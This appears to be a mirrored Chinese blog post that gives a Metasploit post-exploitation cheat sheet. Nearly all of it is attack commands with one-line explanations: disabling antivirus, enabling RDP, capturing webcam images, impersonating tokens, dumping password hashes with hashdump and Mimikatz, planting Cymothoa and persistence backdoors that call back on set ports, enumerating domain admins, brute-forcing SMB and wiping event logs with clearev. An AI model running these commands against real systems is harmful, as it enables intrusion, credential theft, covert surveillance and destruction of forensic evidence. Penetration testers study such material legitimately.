zoukankan      html  css  js  c++  java
  • msf 获取session 之后

    进程迁移:
        ps   获取进程
        getpid  shell的进程号
        migrate  迁移
        run post/windows/manage/migrate     自动迁移
    
    
    shell之后:
        sysinfo 获取系统信息
        run post/windows/gather/checkvm        查看目标是否允许在虚拟机
        idletime        最近运行的时间
        route        查看目录完整网络
        getuid        当前用户名
        run post/windows/manage/killav        关闭杀毒软件
        run post/windows/manage/enable_rdp    开启3389
        run post/windows/manage/autoroute    目标子网情况
        background    隐藏后台
        route add    添加路由
        route    print查看
        run post/windows/gather/enum_logged_on_users    列举当前有多少用户登录过目标主机
        run post/windows/gather/enum_applocations        列举安装在目标主机上
        run post/windows/gather/credentials/windows_autologin    抓取自动登录的用户名密码
        load espia   screengrad    抓取此时屏幕截图
        webcam_list    有无摄像头
        webcam_snap    拍照
        webcam_stream    开启直播模式
        shell 进入目标shell
    文件系统命令:
        pwd或getwd    目标主机当前处于哪个目录
        getlwd    自己处于哪个目录
        search -f *.txt -d c:    搜索c盘下所有txt文件
        download    c:	est.txt /root 下载到本机
        upload    /root/text.txt c:    上传
    
    权限提升:
        whoami/groups    查看当前权限
        getuid    查看当前权限
        getsystem    尝试提权
        systeminfo    查看补丁
        使用wmic    列出安装的补丁
    令牌窃取:
        use incognito
        list_token -u 列出token
        impersonate_token  +上述列出的有效令牌    假冒令牌攻击(需要两个\)
        成功后运行shell
    
    Hash攻击:
        1.使用hashdump 抓取密码
        非SYSTEM运行时会失败
        run windows/gather/smart_hashdump    导出域所有用户(windows7.开启UAC会导致失败)
        2.Quarks    PwDump
        3.windows credentials Editor(WCE)
            上传wce到目标。找到文件 wce -w
        4.Mimikatz(管理员)
        load Mimikatz       加载    
        msv        抓取Hash
        kerberos    抓取系统票据
        wdigest        获取系统账户信息
        mimikatz_command -f samdump::hashed    抓取hash
        mimikatz_command -f handle::list  查看进程
        mimikatz_command -f service::list  windows 服务
        mimikatz_command -f crypto::listProviders  查看系统证书
        支持PowerShell调用(Invoke-Mimikatz)
    
    后门:
        1.Cymothoa:
            cymothoa -p 982 -s 1 -y 4444    选择PID为982的进程为宿主进程,使用第一类Shellcode,指定反弹端口4444
            nc -nvv 目标主机 4444    使用nc进行连接
        2.Persistence:
            run persistence -A -S -U -i 60 -p 4321 -r 目标主机
                A :自动启动payload程序
                S :系统启动时自动加载
                U :用户登录时自动启动
                X :开机时自动加载
                i :回连的时间间隔
                P :监听反向连接端口号
                r :目标主机
    Web 后门:
        msf中使用generate生成
    
    内网渗透:
        信息收集:
            net user /domain : 查看域用户
            net view /domain :    查看有几个域
            net    view /domain :xxx    查看域内主机
            net group /domain  : 查看域里面的组
            net group "domain computers" /domain 查看域内所有的主机名
            net group "domain admins " /domain 查看域管理员
            net group "domain controllers" /domain 查看域控制器
            net group "enterprise admins" /domain 查看企业管理器
            nettime /domain 查看时间服务器
    
        PowerShell 寻找域管在线服务
        获取域管理权
        登录域控制:使用msf中的PsExec 反弹Meterpreter
    
    SMB爆破内网:
        先添加路由
        然后使用smb_login 或psexec_scanner
        route add 
        creds
    
    清理日志:
        删除所有用户
        clearev    删除日志
  • 相关阅读:
    DRBD试用手记
    hibernate get load difference
    4招将PPT文本转换成Doc文本
    about lucene merepolicy
    关于Lucene索引合并解决方法
    网站优化工具帮助
    A/B Experiments with Google Website Optimizer
    about lucene grouping and facet history
    Spring IDE 1.2.4发布
    HTML meta refresh 刷新与跳转(重定向)页面
  • 原文地址:https://www.cnblogs.com/pangya/p/10096142.html
Copyright © 2011-2022 走看看